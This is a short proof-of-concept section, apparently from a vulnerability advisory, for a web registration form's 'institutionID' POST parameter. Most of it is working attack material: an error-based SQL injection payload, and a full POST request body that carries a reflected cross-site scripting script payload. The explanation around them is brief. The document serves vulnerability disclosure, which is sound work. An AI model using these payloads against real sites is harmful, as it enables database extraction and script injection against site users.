Proof of Concept: ================= The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... Parameter Name: institutionID Parameter Type: Post This parameter value can be affected in many ways ... Attack 1 => "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100), CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" Attack 2 => '"--> For implementing goto any of the url mentioned above and ... ... use any HTTP header editor send this data as post. action=register&eventID=5j2n0-eP6ER&instcity=3&instcountry=3&institutionID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3ealert(0x000263)%3c%2fscript%3e&instmarket=k12&inststate=3&instzip=3&noschool=y®Address1=3®Address2=3®City=3®Country=3®Email=gfdfgf%40dum.com®FirstName=dummy+fjf®ID=VqdX4-o9e-3cw-3eCI-4i32L®JobTitle=3®LastName=dummy+fjf®Organization=3®Phone=3®QualifyRole=3®QualifyStage=3®State=3®Zippc=3&token=b35cfeb45187cca5efb6623c216b957a The issue is exploitable as sql injection and cross site scripting vulnerability because of a broken input filter or exception-handling.